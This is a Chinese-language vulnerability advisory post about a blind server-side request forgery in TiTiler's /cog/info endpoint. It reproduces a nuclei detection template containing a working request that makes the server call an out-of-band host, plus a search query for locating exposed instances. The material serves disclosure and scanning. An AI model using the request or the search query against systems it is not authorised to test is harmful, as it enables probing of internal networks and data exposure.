TiTiler Blind Server Side Request Forgery

漏洞信息

漏洞名称: TiTiler Blind Server Side Request Forgery

漏洞类型: 服务端请求伪造

漏洞等级: 高危

漏洞描述: TiTiler是一个为云优化的GeoTIFFs(COGs)提供动态瓦片服务的服务器。该漏洞存在于TiTiler处理/cog/info端点中的url参数的方式中,允许攻击者发起任意的内部或外部HTTP请求。这种服务端请求伪造(SSRF)漏洞的根源在于应用程序未能正确验证和限制用户提供的URL参数,从而导致可以绕过网络边界限制,访问或攻击内部服务。这种漏洞的高危性在于,攻击者可以利用它来探测内部网络结构,访问敏感数据,或作为进一步攻击的跳板。由于TiTiler在处理请求时未能充分验证url参数,攻击者可以构造恶意请求,使得服务器向攻击者控制的地址发起请求,从而泄露敏感信息或执行未授权的操作。此漏洞的利用不需要用户认证,且可以自动化执行,因此对部署了TiTiler的服务构成了严重的安全威胁。

产品名称: TiTiler

搜索语法: html:”TiTiler”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c01d69eb6758d66b4029a8c915a000497e899bce/http%2Fmisconfiguration%2Ftitiler-ssrf.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

id: titiler-ssrf

info:
name: TiTiler - Blind Server Side Request Forgery
author: xbow,DhiyaneshDK
severity: high
description: |
Blind SSRF vulnerability in TiTiler, a dynamic tile server for Cloud Optimized GeoTIFFs (COGs). The flaw lies in how the application handles the url parameter in the /cog/info endpoint, allowing attackers to make arbitrary internal or external HTTP requests.
reference:
- https://xbow.com/blog/xbow-titiler-lfi/
metadata:
verified: true
max-request: 1
shodan-query: html:"TiTiler"
tags: titiler,oast,obb,ssrf

http:
- raw:
- |
GET /cog/info?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "<imageAttributes> in document")'
condition: and



TiTiler Blind Server Side Request Forgery
http://example.com/2025/08/04/github_3508007288/
作者
lianccc
发布于
2025年8月4日
许可协议